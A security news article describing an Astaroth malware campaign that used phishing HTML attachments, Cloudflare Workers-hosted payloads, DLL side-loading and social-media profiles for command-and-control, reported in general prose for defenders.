Home » News » Criminals use the Cloudflare Workers platform to bypass antiviruses and distribute Astaroth malware

Criminals use the Cloudflare Workers platform to bypass antiviruses and distribute Astaroth malware

As part of a recent malware campaign, criminals distributed a new version of Astaroth malware. To prevent detection of antivirus software, attackers use the Cloudflare Workers platform.

Cloudflare Workers is a collection of scripts running on Cloudflare servers. They are located in data centers in 90 countries and 193 cities. The platform allows running any JavaScript code without the need to maintain an infrastructure.

Cloudflare Workers during the malicious campaign of criminals plays the role of one of the parts of the attack. Attackers send a phishing email disguised as a regular survey with an attached HTML attachment.

“This is not a simple HTML file with external links to malware. It’s a carefully crafted and contains obfuscated Javascript code”, — reports Marcel Afrahim from Endpoint Security and Malware Research.

The attachment contains obfuscated JavaScript code associated with a domain in the Cloudflare infrastructure. This domain is used to deliver several types of malicious load in JSON format. To avoid blocking, criminals can quickly change malicious files.

Read also: Experts found a critical vulnerability in the Cisco routers with a threat level of 10 out of 10 points

To implement the second stage of the attack, JSON is parsed from the URL, converted from Base64 to Array, renamed to match the name of the HTML file. Next, a special link is automatically generated, which starts the download of malware on the user’s computer.

As part of the third stage, the malicious DLL is loaded, which is controlled by the accounts of malicious users in YouTube and Facebook. Accounts in this case play the role of a C&C server.

“According to analysis of the samples involved, after the DLL side loading, one of the Diebold Warsaw installation binaries, which is a security suite used on systems accessing online banking in Brazil, is hollowed and used to communicate to Facebook and Youtube profiles in order to obtain the Final C2 addresses”, — reported Renato Marinho of Morphus Labs.

The threat actors currently behind the Astaroth campaign are going through a great length in order to escape detection and fool the conventional Security Solutions.

Security researchers discovered the spread of the Astaroth malware last month, but since that time, attackers have begun to use new, most innovative techniques to avoid detection and hide their traces in infected organizations.

About Lyubov Samoilova

I have worked in the antivirus software industry for 5+ years and am passionate about all things relating to tech content marketing, creativity, and making the world a more safety place. I am increasingly excited about the ways technology and communication are intersecting in the 21st century and am always looking for ways to expand my experience.

Check Also

Smaters.exe file in Task Manager – how to fix?

Smaters.exe – What is it? To see Smaters.exe process in the Task Manager is an …

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.